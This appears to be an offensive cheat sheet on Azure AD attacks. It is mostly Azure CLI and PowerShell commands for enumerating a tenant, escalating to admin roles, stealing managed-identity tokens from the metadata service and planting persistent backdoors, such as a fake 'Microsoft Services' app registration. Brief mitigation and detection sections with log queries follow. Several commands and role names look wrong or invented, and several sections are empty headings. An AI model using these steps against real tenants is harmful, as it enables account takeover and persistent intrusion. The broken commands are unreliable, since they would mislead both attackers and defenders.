Critical Severity | T1078
☁️ Azure AD Attack Techniques
🧠 Description
Azure Active Directory (Azure AD) is Microsoft's cloud-based identity and access management service. Attacks against Azure AD target authentication mechanisms, service principals, managed identities, and application permissions to gain unauthorized access and persist in the cloud environment.
Why Azure AD is Targeted:
- Single Sign-On: Compromising Azure AD grants access to many apps
- Service Principals: Often have excessive permissions
- Managed Identities: Can be abused for privilege escalation
- Legacy Integrations: Sync from on-prem AD exposes hybrid flaws
- Application OAuth: Malicious app registrations for persistence
🔍 Azure AD Enumeration
Azure CLI Setup:
# Install Azure CLI curl -sL https://aka.ms/install-azure-cli | bash # Login az login # Show current tenant info az ad signed-in-user show az account tenant list # List subscriptions az account list --all
User Enumeration:
# List all users
az ad user list --query '[].{displayName:displayName,mail:mail,userType:userType}' -o table
# Get specific user
az ad user show --id user@company.com
# List groups
az ad group list --query '[].{displayName:displayName,description:description}' -o table
# List group members
az ad group member list --group-id
# List service principals
az ad sp list --query '[].{displayName:displayName,appId:appId}' -o table
Application Enumeration:
# List enterprise applications
az ad app list --query '[].{displayName:displayName,appId:appId}' -o table
# Get app permissions
az ad app permission list --id
# List delegated permissions
az ad app show --id --query 'oauth2Permissions'
# Check app roles
az role assignment list --assignee
Role Assignments:
# List role assignments
az role assignment list --all --output table
# List built-in roles
az role definition list --query '[].{name:name,description:description}' -o table
# Get permissions for a role
az role definition list --name "Contributor"
# Scope: subscription, resource group, or resource
🔓 Privilege Escalation
Technique 1: Service Principal Key Creation:
# Check if you can create credentials on service principals az ad sp credential list --id# Add credential to service principal az ad sp credential list --id # If you have app permission az ad sp credential delete --id --key-id # Create new password credential az ad sp credential reset --id --append
Technique 2: Add Owner to Application:
# Check if you can add owners
az role assignment create \
--role "Owner" \
--assignee \
--scope /applications/
# Add yourself as owner to app
az ad app owner add --id --owner-object-id
Technique 3: Assign Application Admin Role:
# List available role assignments
az role assignment list --scope /providers/Microsoft.MachineLearningServices
# Grant application admin
az role assignment create \
--role "Application Admin" \
--assignee \
--scope /tenant
# Or global admin
az role assignment create \
--role "Global Admin" \
--assignee \
--scope /tenant
Technique 4: Exploit Logic App Managed Identity:
# Check for Logic Apps with system-assigned identity
az logic workflow show --resource-group MyResourceGroup --name MyWorkflow
# If Logic App has contributor role on RG, escalate
az resource update --ids /subscriptions/xxx/resourceGroups/RG/providers/Microsoft.Logic/workflows/LogicApp
# Get token via managed identity
curl -X POST http://169.254.169.254/metadata/identity/oauth2/token \
-H "Metadata: true" \
-d "resource=https://management.azure.com/"
🔑 Managed Identity Exploitation
Azure Instance Metadata Service (IMDS):
# Get access token from VM with managed identity curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -H "Metadata:true" # Or for specific resource curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net/' -H "Metadata:true" # Get IMDSv2 token (requires token) curl -X PUT 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -H "X-IDENTITY-HEADER: $IDENTITY_TOKEN"
From Azure Functions/Lambda Equivalent:
Privilege Escalation via VM Managed Identity:
# If VM has "Contributor" on subscription # You can execute code on VM (via RCE or existing access) # Then extract managed identity token and call Azure API # Use Azure management API to: # 1. Create new user # 2. Add yourself to Global Admin # 3. Create new service principal # 4. Assign roles to yourself
🎯 Persistence Mechanisms
1. Malicious Application Registration:
# Register an application
az ad app create \
--display-name "Microsoft Services" \
--password "SuperSecret123!" \
--required-resource-access '[
{"resourceAppId":"00000003-0000-0000-c000-000000000000","resourceAccess":[
{"id":"e1fe6f66-5d27-4d38-976d-xxxxxxxxxxxx","type":"Role"}
]}
]'
# Add credential (stays even after password reset)
az ad sp credential reset --id --append
# Grant admin consent
az ad app permission admin-consent --id
2. Service Principal Backdoor:
# Create service principal with high permissions az ad sp create-for-rbac --role Contributor --scope /subscriptions/# Or with more privileges az ad sp create-for-rbac --role "User Access Administrator" --scope /subscriptions/ # Save the output - this is your backdoor # { # "appId": "...", # "password": "...", # "tenant": "..." # }
3. Add Backdoor to Existing App:
4. Role Assignment on Subscription:
🚀 Lateral Movement
Accessing Resources:
Access Azure SQL:
Container Registry Access:
🛡️ Mitigation
✅ Security Best Practices:
- Conditional Access: Require MFA for all admin access
- Privileged Identity Management: Use just-in-time access
- Disable IMDS: For VMs that don't need it
- Audit Service Principals: Remove unused credentials
- App Registration Restrictions: Limit who can create apps
- Monitor Role Assignments: Alert on Global Admin changes
Azure AD Security Center Recommendations:
# Check security recommendations
az security recommendation list --query '[].{name:name,category:category}' -o table
# Enable PIM for admin roles
az role assignment create \
--role "Privileged Role Administrator" \
--assignee-object-id \
--scope /tenants/
# Disable legacy authentication
az ad set-user-legacy-auth-status --id --disable-legacy-authentication
🔍 Detection
Azure AD Sign-In Logs:
# Use Log Analytics for Azure AD # Query unusual sign-ins SigninLogs | where TimeGenerated > ago(1d) | where ResultType != 0 | where AppId == "797f4846-0000-0000-0000-000000000000" | project TimeGenerated, UserPrincipalName, IPAddress, Location, ResultDescription # Suspicious app registrations AuditLogs | where OperationName == "Add application" | where Result == "success" | project TimeGenerated, ActorName, TargetResources # New owner added AuditLogs | where OperationName == "Add owner to application" | project TimeGenerated, ActorName, TargetResources
Azure Sentinel Detection Rules:
🛠️ Tools
Azure Attack Tools:
- MicroBurst: Azure enumeration and exploitation
- Stormspotter: Azure red team tool
- AzureHound: Azure AD attack tool (similar to BloodHound)
- PowerZure: Azure exploitation framework
PowerZure Examples:
Import-Module PowerZure Connect-Azure -Account# Enumerate Get-AzureTargets Get-AzureRoles Get-AzureUsers Get-AzureResources # Exploit Get-AzureVMExecute -ResourceGroup -VMName Get-AzureVMImmersive -ResourceGroup -VMName
MicroBurst:
Import-Module .\MicroBurst.ps1 # Enumerate Get-AzurePasswords Get-AzureAppInfo Get-AzureUsers # Blasting Invoke-AzureEnum -App secret Get-AzureBlobFiles -base